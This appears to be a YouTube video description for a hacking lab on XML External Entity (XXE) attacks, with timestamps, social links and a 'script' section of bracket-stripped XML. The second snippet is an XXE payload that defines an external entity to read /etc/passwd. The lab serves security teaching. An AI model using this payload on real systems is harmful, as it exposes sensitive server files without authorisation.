------------------------------TIMESTAMP--------------------------
0:00 Intro
1:10 Lab
4:55 Attack Solutions
-----------------------------------------------------------------------------
XML files can incorporate inline references to other documents. Unsafe treatment of external references allows an attacker to probe your file system for sensitive information - an XML External Entity (XXE) attack.
Leave a like & follow for more video about hacking. Please leave a comment below to help me to show you better content, and don't forget to leave me one of those ;) Have a great day by Zuniga security.
● Buymeacoffee: https://www.buymeacoffee.com/zunigasec
You can find me on:
● MY INSTAGRAM - / zunigasecur
● TIKTOK - https://vm.tiktok.com/ZMe2jvf2n/
● TWITTER - https://twitter.com/zunigasecurity?s=09
● FACEBOOK - / zunigasecurit
---------------------------USEFUL LINK---------------------------
Take a look here: https://application.security/free/owa...
-----------------------------SCRIPT-------------------------------
!DOCTYPE myFile [
!ELEMENT someEntity ANY
!ENTITY someEntity "Hello guyss"
]
myXmlFile
message&someEntity;/message
/myXmlFile
/////////////////////////
!DOCTYPE myFile [
!ELEMENT fileEntity ANY
!ENTITY fileEntity SYSTEM "file:///etc/passwd"
]
myXmlFile
message&fileEntity;/message
♫ Track: [Electro Swing] ExoNova - Electro Swingity [No Copyright Music]
♫ Watch: https://www.youtube.com/watch?v=GMhoi...